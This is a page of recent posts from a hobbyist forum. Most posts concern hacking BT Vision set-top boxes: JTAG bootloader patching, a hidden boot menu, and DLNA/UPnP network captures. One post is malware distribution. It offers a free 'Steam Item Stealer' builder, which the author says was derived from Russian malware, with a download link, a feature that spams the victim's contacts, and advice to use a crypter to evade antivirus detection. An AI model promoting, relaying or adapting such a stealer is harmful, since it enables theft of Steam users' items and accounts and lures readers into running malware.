03. Jul 2022, 18:48

Recent Posts

Pages: 1 [2] 3 4 ... 10
11
Software / Steam Item Stealer
Last post by SempreFi - 29. Nov 2014, 14:58
Hey guys.
I'm new here so I want to share some of my knowledge.
I am releasing a free steam stealer so you do not have to spend $50 on them anymore!

I reverse engineered some Russian malware and created a builder out of it for members of HackForums to use!

-Enter your Steam64, OfferID, and OfferToken to recieve items
-Custom message that will send to all contacts on the steam friends list
-Not FUD, however most steam stealers that say they are FUD might just be detected at runtime which is why they do not get good results. I do recommend a crypter which will make this undetected.
-This builder is extremely simple and took around 5 minutes to make, please give feed back on what you think of this software!

Download link: https://mega.co.nz/#!cMgxkaTB!FzVdg43wuR6eiIdK0boV3ifgs8gUv54zNwNO0LlJAds
If you are afraid of download, just test with sandiebox.

Any problems or questions just pm me !

Proofs:
[img link=]http://i.imgur.com/luLzbHF.jpg[/img]
12
Hardware / Replacing HDD in X301T
Last post by iqlogic - 14. Sep 2014, 08:01
Hello friends,

please, could you tell me if there is any change to replace original HDD in X301T? Original one is very noisy  :(
And another question. Can I use some SATA-to-IDE converter? I have some spare SATA HDD so I would use it.

Many many thanks guys  ;)
13
Hardware / Re: HOW TO
Last post by inside4ndroid - 27. Jul 2014, 14:49
hi everyone i am new here as i have just aquired a BT Vision PACE DIT7431/05 with the bt vision card still in it although i do not have bt broadband and never will.. sooo i would like to hop on board and blow this little box apart :)

i have extensive experiance in jtagging xbox360's and mobile phones but i have never done a box like this before.. i have done a lot of reading but i am still a little confused on how to get the ATMEGA8 chip hooked up?? i have the pdf from the first post although that pcb board is different to my box?

i have found this image which is0-mick here on the forums has kindly made available..



could someone help me with connecting this up to the chip and jtag ltp port?

thanks in advance..
14
Software / Re: Bootloader Patcher
Last post by Irgendjemand - 26. Jul 2014, 19:55
Hallo
Ich hatte von einem Kollegen eine defekte X300T bekommen, welche ich durch den Tausch zweier Elkos wieder reparieren konnte.
Ich musste jedoch feststellen, dass sich diese unmodifiziert nicht sinnvoll nutzen lässt und fände es Schade, wenn diese trotz RaspberryPI, etc. noch interessante Box auf dem Müll landen würde.
So hatte ich den JTAG-Adapter mit 74HC244 aus dem Wiki nachgebaut und LX.bin sowie YA.bin auf die erste Partition der Festplatte kopiert.
Außerdem habe ich eine Box ohne herausgeführter JTAG_ENABLE Leitung, sodass ich auf dem Prozessor löten musste (Rev 0J).
Dies scheint soweit funktioniert zu haben, da ich zwischen GND und dem angelöteten Draht die Diodenstrecke einer ESD-Schutzdiode des Prozessors messen konnte.
Den Draht habe ich mit dem JTAG_ENABLE-Jumper verbunden, welchen ich zusätzlich gebrückt habe.
Des weiteren hatte ich noch über den Trick mit der OK-Taste die "Internet OK?"-Meldung provoziert.
Wenn ich jedoch versuche mit dem Bootloader Patchtool ein Alternatives Bootimage zu starten, wird offenbar zwar der Chip erkannt, der Controller kann jedoch nicht in den Debug Modus versetzt werden und das Tool bleibt daraufhin mit der Meldung "Clearing Watchdog" hängen. Die Ausgabe einer Meldung über den Videoausgang der Box stoppt mit dem Ausführen des Tools.
Der Bootloader Patcher liefert die folgende Ausgabe:
Code: [Select]

C:\User\me\files\X300tpatch3>X300tpatch3.exe /yamon /wiggler

===========================================================
X300t bootloader patcher v3.0  by MCE2222 / Robert_S
based on WRT54G/GS EJTAG Debrick Utility which
is actually derived from Mips32 EJTAG from
TotalEmbedded without giving credit... ts ts ts
===========================================================
= This version only works on bootloader V1053,V1051,V1039 =
===========================================================

USAGE: x300tpatch
            /wiggler ........... use wiggler cable

            /linux ............. boot LX.BIN

            /yamon ............. boot YA.BIN

            -----------------------------------------------

starting YA.BIN

using Wiggler interface
Probing bus ... Done

CPU Chip ID: 00001000011000110000000000000001 (08630001)
*** Found a SigmaDesigns SMP8634 Rev A CPU chip ***

Issuing Processor / Peripheral Reset ... Done
Halting Processor ... <Processor did NOT enter Debug Mode!> ... Done
Clearing Watchdog ...


Auf dem seriellen Port der Box sind dabei auch keine neuen Meldungen zu erkennen:
Code: [Select]

<\0>xosPee serial#3713163027ffa953af755f8f350b17f4 subid 0xc4
xenv cs2 ok
power supply: ok
dram0 ok (8)
dram1 ok (8)
zboot (0) ok
SIGNED BL

Microsoft IPTV Bootloader, Build (1051)
Built by BM-DELL-167, Sep 11 2006 16:54:12



Ich hatte auchschon das einfache JTAG-Kable mit vier 100 Ohm Widerständen probiert, welches jedoch überhaupt nicht funktioniert, da irgendjemand gemeint hatte, dass er bei der komplexeren Schaltung Probleme mit einer Masseschleife hatte. Mir sah es jedoch eher danach aus, als ob der VIO-Pin nicht belastbar genug ist um den 74HC244 zu versorgen, sodass ich diesen bei meinen Tests extern versorgte.

Irgendjemand hier im Forum hatte auch gemeint, es gäbe neuere Firmware Versionen, welche das JTAG-Interface per Software deaktivieren könnten. Könnte dies eventuell bei meiner Box der Fall sein? Gibt er hierüber nähre Informationen, was wäre dann zu tun?

Hat sonst noch jemand eine Idee weshalb ich die genannten Probleme beim Patchen haben könnte?
15
WinCE / Re: tv2remotekeys ?
Last post by VisionUser - 17. Jul 2014, 21:18

Well, that's easy... According to http://msdn.microsoft.com/en-us/library/aa453696.aspx the folder for MIPS CPUs is 4000...

The problem is... I'm quite sure the autorun functionality is implemented by the Windows shell (explorer.exe or whatever they use on Windows Mobile)

And the STB isn't running the shell :)

When a USB flash drive is plugged into the box before boot up, the box will access the flash drive 2 times early on during the boot up process. The question is, what file is it looking for on the USB flash drive? Could it be looking for a firmware update or a file to execute?
16
Software / Re: BT Vision Box Hidden Menus
Last post by VisionUser - 17. Jul 2014, 20:59
I found out how to get back into the hidden menu. Now I can enter the hidden menu at will!

In order to enter the secret menu, you must disrupt the boot process by either:
1) Removing the ethernet cable halfway though bootup
2) Blocking the box from loading certain URLs during bootup with a firewall/web filtering software etc.

The URL's to block (might not need to block them all):
sg05clgv.nevis.btopenworld.com/dvrV2/DVRScheduler.asmx
sg05clgv.nevis.btopenworld.com/ListingsClientDataDelivery/PackedListingsForClient/
sg05clgv.nevis.btopenworld.com/clientsms/Purchase.asmx
sg05clgv.nevis.btopenworld.com/clientsms/GetGroupGrantedKeys.ashx
sg05clgv.nevis.btopenworld.com/MDWS/MediaDiscovery.asmx
/clientuserstore/UserStore.asmx <--- This might be the only one you really need to block
/MDWS/MediaDiscovery.asmx
/vodCatalogWS/catalog.asmx


If you block those URLs, then the box will get stuck on the grey bootup screen.
- Then put it into standby, then take it out of standby
- The screen should now be either black, or asking you to enter a 4 digit pin code (depending on which urls you block)
- Press the main menu button, and now the secret menu will appear!

I think the "secret menu" is actually the default menu on the box that happens before it loads "the client user store" and if you block the user store, then it goes to the "secret menu" by default.

Inside the secret menu, you can turn on the DLNA/upnp client or use it's built in web browser. With some dns spoofing, you can get it to load any web page you want as long as it is valid xhtml.

The DLNA client says it wants to connect to Windows Media Player 11, but I successfully got it to connect to PS3 Media Server using the Xbox 360 profile.

Quite annoying to discover the silver box has a DLNA client all along but I didn't find out until now. And getting into the secret menu turned out to be quite easy.
17
Software / DLNA client on silver BT visio...
Last post by VisionUser - 17. Jul 2014, 20:52
If you boot into the secret menu, there is a "Personal Media Settings" option to "Enable playback from home network". If you do this, it will turn the silver BT Vision box into a DLNA upnp client! When you select "Photos music and video" from the secret menu, it will then look on your local network for a DLNA server.

The following network activity can be observed:

Code: [Select]
NOTIFY * HTTP/1.1
Host: 239.255.255.250:1900
Cache-Control: max-age=1800
Location: http://192.168.0.4:53208/upnp/1
NT: uuid:-----------------------------
NTS: ssdp:alive
Server: CESTB/6.1 UPnP/1.0 DMP/5.0
USN: uuid:-----------------------------
OPT: "http://schemas.upnp.org/upnp/1/0/"; ns=01

NOTIFY * HTTP/1.1
Host: 239.255.255.250:1900
Cache-Control: max-age=1800
Location: http://192.168.0.4:53208/upnp/1
NT: uuid:-----------------------------
NTS: ssdp:alive
Server: CESTB/6.1 UPnP/1.0 DMP/5.0
USN: uuid:-----------------------------
OPT: "http://schemas.upnp.org/upnp/1/0/"; ns=01

NOTIFY * HTTP/1.1
Host: 239.255.255.250:1900
Cache-Control: max-age=1800
Location: http://192.168.0.4:53208/upnp/1
NT: upnp:rootdevice
NTS: ssdp:alive
Server: CESTB/6.1 UPnP/1.0 DMP/5.0
USN: uuid:-----------------------------::upnp:rootdevice
OPT: "http://schemas.upnp.org/upnp/1/0/"; ns=01

NOTIFY * HTTP/1.1
Host: 239.255.255.250:1900
Cache-Control: max-age=1800
Location: http://192.168.0.4:53208/upnp/1
NT: upnp:rootdevice
NTS: ssdp:alive
Server: CESTB/6.1 UPnP/1.0 DMP/5.0
USN: uuid:-----------------------------::upnp:rootdevice
OPT: "http://schemas.upnp.org/upnp/1/0/"; ns=01

NOTIFY * HTTP/1.1
Host: 239.255.255.250:1900
Cache-Control: max-age=1800
Location: http://192.168.0.4:53208/upnp/1
NT: urn:schemas-upnp-org:device:MediaRenderer:1
NTS: ssdp:alive
Server: CESTB/6.1 UPnP/1.0 DMP/5.0
USN: uuid:-----------------------------::urn:schemas-upnp-org:device:MediaRenderer:1
OPT: "http://schemas.upnp.org/upnp/1/0/"; ns=01

NOTIFY * HTTP/1.1
Host: 239.255.255.250:1900
Cache-Control: max-age=1800
Location: http://192.168.0.4:53208/upnp/1
NT: urn:schemas-upnp-org:device:MediaRenderer:1
NTS: ssdp:alive
Server: CESTB/6.1 UPnP/1.0 DMP/5.0
USN: uuid:-----------------------------::urn:schemas-upnp-org:device:MediaRenderer:1
OPT: "http://schemas.upnp.org/upnp/1/0/"; ns=01

NOTIFY * HTTP/1.1
Host: 239.255.255.250:1900
Cache-Control: max-age=1800
Location: http://192.168.0.4:53208/upnp/1
NT: urn:schemas-upnp-org:service:ConnectionManager:1
NTS: ssdp:alive
Server: CESTB/6.1 UPnP/1.0 DMP/5.0
USN: uuid:-----------------------------::urn:schemas-upnp-org:service:ConnectionManager:1
OPT: "http://schemas.upnp.org/upnp/1/0/"; ns=01


If you visit the following URL, you will be met with this xml:

http://192.168.0.4:53208/upnp/1  <--- box IP address
Code: [Select]

  <?xml version="1.0" encoding="utf-8" ?>
- <root xmlns="urn:schemas-upnp-org:device-1-0">
- <specVersion>
  <major>1</major>
  <minor>0</minor>
  </specVersion>
- <device>
  <deviceType>urn:schemas-upnp-org:device:MediaRenderer:1</deviceType>
  <dlna:X_DLNADOC xmlns:dlna="urn:schemas-dlna-org:device-1-0">DMR-1.50</dlna:X_DLNADOC>
  <UDN>uuid:-----------------------------</UDN>
  <friendlyName>Mediaroom Device</friendlyName>
  <manufacturer>Mediaroom</manufacturer>
  <manufacturerURL>http://www.microsoft.com/</manufacturerURL>
  <modelName>Mediaroom</modelName>
  <modelNumber>Microsoft Windows CE 5.0.1400</modelNumber>
  <modelURL>http://www.microsoftmediaroom.com/</modelURL>
  <modelDescription>Mediaroom Client</modelDescription>
  <serialNumber>----------</serialNumber>
- <iconList>
- <icon>
  <mimetype>image/png</mimetype>
  <width>48</width>
  <height>48</height>
  <depth>24</depth>
  <url>/upnp/2</url>
  </icon>
  </iconList>
- <serviceList>
- <service>
  <serviceType>urn:schemas-upnp-org:service:ConnectionManager:1</serviceType>
  <serviceId>urn:upnp-org:serviceId:ConnectionManager</serviceId>
  <SCPDURL>/upnp/4</SCPDURL>
  <eventSubURL>/upnp/4e</eventSubURL>
  <controlURL>/upnp/4c</controlURL>
  </service>
- <service>
  <serviceType>urn:schemas-upnp-org:service:AVTransport:1</serviceType>
  <serviceId>urn:upnp-org:serviceId:AVTransport</serviceId>
  <SCPDURL>/upnp/5</SCPDURL>
  <eventSubURL>/upnp/5e</eventSubURL>
  <controlURL>/upnp/5c</controlURL>
  </service>
- <service>
  <serviceType>urn:schemas-upnp-org:service:RenderingControl:1</serviceType>
  <serviceId>urn:upnp-org:serviceId:RenderingControl</serviceId>
  <SCPDURL>/upnp/3</SCPDURL>
  <eventSubURL>/upnp/3e</eventSubURL>
  <controlURL>/upnp/3c</controlURL>
  </service>
  </serviceList>
  </device>
  </root>


It states that it wants to connect to Windows Media Player 11, but I managed to get it to connect to PS3 Media Server! Then you can browse it for media. The silver BT Vision box had secret DLNA capability the whole time. And there was no need to install mod-chips on the box, just booting into the secret menu was all that was required!
18
Others / BT servers switching off 22 Ju...
Last post by VisionUser - 16. Jul 2014, 21:15
BT sent a letter in the post saying they are axing the BT Vision service on 22 July 2014. More info on it here: http://www.a516digital.com/2014/04/bt-vision-to-close-this-summer.html

If they really do turn the servers off, then the silver BT Vision box could become unbootable and unusable even as a Freeview PVR. It is a sad day. The silver BT Vison box was a good solid PVR, shame to see BT kill a perfectly good piece of kit (and appallingly wasteful and damaging for the environment). It never missed a recording or developed problems with its hard drive in 5 solid years of service.

Other Freeview PVRs are apparently very unreliable and prone to going wrong (most of them Linux based). So I'm really going to miss the silver box if BT actually do kill it off.

The question is, could there be any way to get a computer to impersonate the BT servers so the silver box can continue to live a happy life as a Freeview PVR?

The silver boxes communications with the BT servers are encrypted, so can't be easily replicated.  Has anyone had any success in decrypting it or peeking inside the boxes code to see what kind of responses a fake BT server should give?
19
Software / Re: BT Vision 2.0 Black Box li...
Last post by steve3123 - 07. Jul 2014, 16:14

Hello, Is there anybody in there? Just nod if you can hear me Is there anyone home !!

Picked up another of these boxes today  --- this one boots up with a different screen and works as a Freeview box.
The menu looks different.
Is there any way of sniffing the software off this one and using it in the other one?
Is this info on the hard drive or written into the board?
I haven't tried swapping the hard drives over to see if it will make the bad one work.

Any help appreciated --- even if you read this please just reply with a hello !!
Thanks
Regards


whoops, sorry for the delay. From how I understand the BTvision box works the new firmware is downloaded and written to the box itself, its not stored on the hard drive so there is no way to copy it.
20
Hardware / Re: HOW TO
Last post by n13ldo - 30. Jun 2014, 08:18
Registered here as I found this thread in relation to the BT Vision Box I've acquired.

There is a PDF on post #1 of this thread, ok but the PC support files linked to megaupload are no more as the host is gone.

Can someone else on here make these available somehow?

Thanks  8)
Pages: 1 [2] 3 4 ... 10